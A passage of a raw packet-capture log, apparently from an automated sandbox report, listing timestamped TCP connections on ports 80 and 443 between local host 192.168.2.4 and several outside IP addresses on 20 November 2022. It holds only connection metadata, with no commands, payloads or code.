                                                        Nov 20, 2022 23:29:06.469147921 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469171047 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469201088 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469232082 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469249964 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469263077 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469294071 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469322920 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469322920 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469353914 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469387054 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469389915 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469422102 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469429016 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469448090 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469451904 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469481945 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469513893 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469516993 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469547987 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469553947 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469578981 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469609022 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469619036 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469638109 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469667912 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469676971 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469700098 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469718933 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469731092 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469762087 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469785929 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469794989 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469806910 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469825029 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469854116 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469872952 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469885111 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469913960 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469923973 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469944954 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.469969988 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.469974041 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470005035 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470009089 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.470035076 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470065117 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470073938 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.470093966 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470124006 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470135927 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.470153093 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470177889 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:06.470182896 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:06.470215082 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025521040 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025558949 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025593996 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025616884 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.025630951 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025666952 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025691032 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.025702953 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025738955 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025743961 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.025774956 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025810957 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025815964 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.025847912 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025883913 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025918007 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.025921106 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025958061 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.025991917 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.025994062 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026031017 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026031971 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026067972 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026094913 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026104927 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026143074 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026160955 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026179075 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026213884 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026249886 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026253939 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026288033 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026314974 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026325941 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026361942 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026398897 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026436090 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026448011 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026470900 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026508093 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026525974 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026542902 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026578903 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026582003 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026613951 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026629925 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026649952 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026686907 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026712894 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026724100 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026758909 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026794910 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026808023 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026830912 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026865959 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026874065 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026911974 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.026959896 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.026998997 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027034044 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027034998 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027071953 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027108908 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027111053 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027147055 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027182102 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027190924 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027218103 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027241945 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027254105 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027292967 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027328014 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027332067 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027364016 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027403116 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027440071 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027453899 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027476072 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027512074 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027539015 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027549028 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027584076 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027596951 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027618885 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027650118 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027656078 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027692080 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027699947 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027728081 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027765036 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027779102 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027800083 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027837038 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027864933 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027873039 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027909040 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027910948 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.027945995 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027986050 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.027997971 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028022051 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028059006 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028093100 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028095007 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028131008 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028141975 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028166056 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028203011 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028219938 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028239012 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028278112 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028307915 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028314114 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028348923 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028357983 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028384924 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028422117 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028438091 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028456926 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028492928 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028525114 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028529882 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028568029 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028574944 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028603077 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028639078 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028657913 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.028676033 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.028739929 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.029253006 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.297137022 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297216892 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297264099 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297311068 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297358036 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.297386885 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.297436953 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.297436953 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.301995039 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302043915 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302087069 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302131891 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302151918 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302177906 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302221060 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302242994 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302263975 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302284956 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302309036 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302351952 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302386045 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302395105 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302407980 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302438974 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302448034 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302485943 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302495003 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302530050 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302532911 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302571058 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302613974 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302623987 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302654982 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302661896 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302696943 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302700043 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302740097 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302750111 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302783012 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302815914 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302825928 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302834988 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302869081 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.302876949 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302932024 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.302952051 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303000927 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303041935 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303057909 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303085089 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303096056 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303128004 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303136110 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303170919 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303180933 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303214073 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303236961 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303256989 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303272963 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303299904 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303302050 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303339958 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303383112 CET8049703123.253.32.170192.168.2.4
                                                        Nov 20, 2022 23:29:07.303396940 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303396940 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:07.303539991 CET4970380192.168.2.4123.253.32.170
                                                        Nov 20, 2022 23:29:08.151849031 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.363353968 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:08.366508007 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.366631985 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.366631985 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:08.577193975 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.296233892 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.296310902 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.296400070 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:09.296461105 CET4970480192.168.2.4138.36.3.134
                                                        Nov 20, 2022 23:29:09.504890919 CET8049704138.36.3.134192.168.2.4
                                                        Nov 20, 2022 23:29:09.760251999 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.019068003 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:10.022627115 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.022917986 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.022954941 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:10.281825066 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.131357908 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.131469965 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.131572962 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:11.131629944 CET4970580192.168.2.4210.182.29.70
                                                        Nov 20, 2022 23:29:11.390239954 CET8049705210.182.29.70192.168.2.4
                                                        Nov 20, 2022 23:29:11.403815031 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.593519926 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:11.593688965 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.593775034 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.594141960 CET4970680192.168.2.4190.140.74.43
                                                        Nov 20, 2022 23:29:11.791567087 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:12.459825993 CET8049706190.140.74.43192.168.2.4
                                                        Nov 20, 2022 23:29:22.319547892 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319880009 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.319991112 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320017099 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320131063 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320221901 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320247889 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320333958 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320422888 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320450068 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320532084 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320614100 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320636034 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320739985 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320828915 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.320852995 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.320951939 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321048021 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321077108 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321113110 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321212053 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321240902 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321269035 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321352005 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321372986 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321479082 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321566105 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321588993 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321825027 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.321954966 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.321979046 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322211981 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322334051 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.322365046 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322407961 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.322501898 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.322525024 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323112965 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323215008 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323246002 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323333025 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323436022 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323466063 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323493958 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323589087 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323617935 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323649883 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323736906 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323757887 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323848009 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.323935986 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.323957920 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324121952 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324223042 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.324246883 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324459076 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.324512959 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.324542046 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.335315943 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.335359097 CET443497165.135.247.111192.168.2.4
                                                        Nov 20, 2022 23:29:22.335383892 CET49716443192.168.2.45.135.247.111
                                                        Nov 20, 2022 23:29:22.335403919 CET443497165.135.247.111192.168.2.4
